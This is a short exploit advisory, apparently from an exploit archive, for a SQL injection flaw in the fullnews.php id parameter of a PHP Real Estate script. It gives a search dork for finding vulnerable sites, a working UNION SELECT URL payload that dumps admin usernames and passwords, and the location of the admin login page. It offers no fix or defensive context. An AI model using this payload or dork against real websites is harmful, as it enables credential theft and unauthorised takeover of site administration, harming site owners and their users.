id: 2369
date: 12/14/2007
title: PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability
author: t0pP8uZz
cves: 

====================================================================
PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability
====================================================================



--==+================================================================================+==--
--==+		          PHP Real Estate SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: "Browse with Interactive Map"


DESCRIPTION: 
pull admin info from database


EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*


NOTE/TIP: 
admin login is at /admin/




#  0day.today [2023-03-27]  #